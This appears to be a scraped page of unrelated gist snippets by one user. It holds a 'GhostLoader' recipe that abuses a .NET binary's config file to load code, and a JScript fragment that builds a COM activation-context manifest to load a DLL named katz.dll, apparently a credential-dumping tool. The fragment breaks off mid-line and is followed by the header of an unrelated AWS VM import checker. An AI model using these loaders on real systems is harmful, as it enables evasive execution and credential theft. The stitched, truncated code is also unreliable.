coffeegist

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe

coffeegist

new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';

try {
	
	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> 	<file name="katz.dll">     	<comClass         	description="AllTheThings Class"         	clsid="{89565276-A714-4a43-912E-978BFEEDACDC}"         	threadingModel="Both"         	progid="AllTheThings"/> 	</file>  </assembly>';
	var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
	ax.ManifestText = manifest;
	// Create Base64 Object, supports encode, decode 
	var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters.

coffeegist

#!/bin/bash
##########################################################################################
# AWS VM Import Instance Checker 1.2                                                     #
#                                                                                        #
# The script has been implemented to simplify the VM Import process of the virtual       #
# environment in AWS.                                                                    #
#                                                                                        #
# The script checks that the requirements to import a VM in AWS are verified.            #
# Please make a backup of the VM before to proceed.                                      #